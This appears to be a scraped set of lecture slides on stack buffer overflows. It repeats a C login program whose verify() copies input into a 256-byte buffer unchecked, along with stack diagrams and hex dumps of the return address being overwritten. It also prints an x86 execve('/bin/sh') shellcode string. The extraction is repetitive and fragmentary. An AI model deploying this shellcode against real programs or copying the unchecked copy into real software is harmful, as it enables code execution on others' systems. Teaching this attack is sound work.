Upload
others
View
10
Download
0
Embed Size (px)
Citation preview
login
rip
sfp
name[i]
rip
sfp
sfpmain()
login
%esp
%ebp
%eip
verify()
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
user
256
byte
s
login
rip
sfp
name[i]
rip
sfp
sfpmain()
login
%esp
%ebp
%eip
verify()
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i = 0
user
256
byte
s
a0
login
rip
sfp
name[i]
rip
sfp
sfpmain()
login
%esp
%ebp
%eip
verify()
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i = 1
user
256
byte
s
c2 a0
login
rip
sfp
name[i]
rip
sfp
sfpmain()
login
%esp
%ebp
%eip
verify()
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i = 2
user
256
byte
s
c2 a0d7
login
rip
sfp
name[i]
rip
sfp
sfpmain()
login
%esp
%ebp
%eip
verify()
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i = 3
user
256
byte
s
c2 a0d782
login
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
ff 7e6408
name[i]
rip
sfp
sfpmain()
%esp
%ebp
%eip
verify()
i
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 6b0691
a0c2d782ffa86db2307abba9ad7c
ab 627b7a
f7 e193
Exploit
name[i]
rip
sfp
%esp
%ebp
%eip
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
login
ff 7e6408
sfpmain()
verify()
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 6b0691
ab 627b7a
f7 e19300
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfpstrcmp()
strcmp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
login
ff 7e6408
sfpmain()
verify()
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 6b0691
ab 627b7a
f7 e19300
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
login
ff 7e6408
sfpmain()
verify()
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 6b0691
ab 627b7a
f7 e19300
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
user
256
byte
s
c2 a0d782
b3 6b0691
login
ff 7e6408
sfpmain()
verify() 70 e3d5cc
ab 627b7a
f7 e19300
70 e3d5cc
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
user
256
byte
s
c2 a0d782
b3 6b0691
login
ff 7e6408
sfpmain()
verify()
ab 627b7a
f7 e19300
ff 7e6408
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
70 e3d5cc
user
256
byte
s
c2 a0d782
b3 6b0691
login
sfpmain()
verify()
ab 627b7a
f7 e19300
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
login
ff 7e6408
sfpmain()
verify()
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 6b0691
ab 627b7a
f7 e19300
a0c2d782ffa86db2307abba9ad7c
Exploit
gcc -S shell.c
execve("/bin/sh", ...)
char shellcode[] = "\xeb\x1f" /* jmp 0x1f (2) */ "\x5e" /* popl %esi (1) */ "\x89\x76\x08" /* movl %esi,0x8(%esi) (3) */ "\x31\xc0" /* xorl %eax,%eax (2) */ "\x88\x46\x07" /* movb %eax,0x7(%esi) (3) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) (3) */ "\xb0\x0b" /* movb $0xb,%al (2) */ "\x89\xf3" /* movl %esi,%ebx (2) */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx (3) */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx (3) */ "\xcd\x80" /* int 0x80 (2) */ "\x31\xdb" /* xorl ebx,ebx (2) */ "\x89\xd8" /* movl %ebx,%eax (2) */ "\x40" /* inc %eax (1) */ "\xcd\x80" /* int 0x80 (2) */ "\xe8\xdc\xff\xff\xff" /* call -0x24 (5) */ "/bin/sh"; /* .string \"/bin/sh\" (8) */
shell.c
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
main()
verify()
256
byte
s
login
ff 7e6408
sfpmain()
verify()
user
70 e3d5cc
c2 a0d782
b3 6b0691
ab 627b7a
f7 e19300
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
login
ff 7e6408
sfpmain()
verify()
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 4b0691
ab 427b5a
f7 e19300sh # _
&"xyzzy"
user
rip
%esp
%ebp
%eip
sfp
#include // tolower#include // strcmp#include // fgets, fputs
void reveal_secret(){ fputs("SUPER SECRET = 42\n", stdout);}
int verify(const char* name){ char user[256]; int i; for (i = 0; name[i] != '\0'; ++i) user[i] = tolower(name[i]); user[i] = '\0'; return strcmp(user, "xyzzy") == 0;}
int main(){ char login[512]; fgets(login, 512, stdin); if (! verify(login)) return 1; reveal_secret(); return 0;}
i
login
ff 7e6408
sfpmain()
verify()
user
256
byte
s
70 e3d5cc
c2 a0d782
b3 4b0691
ab 427b5a
f7 e19300sh # _
p!a"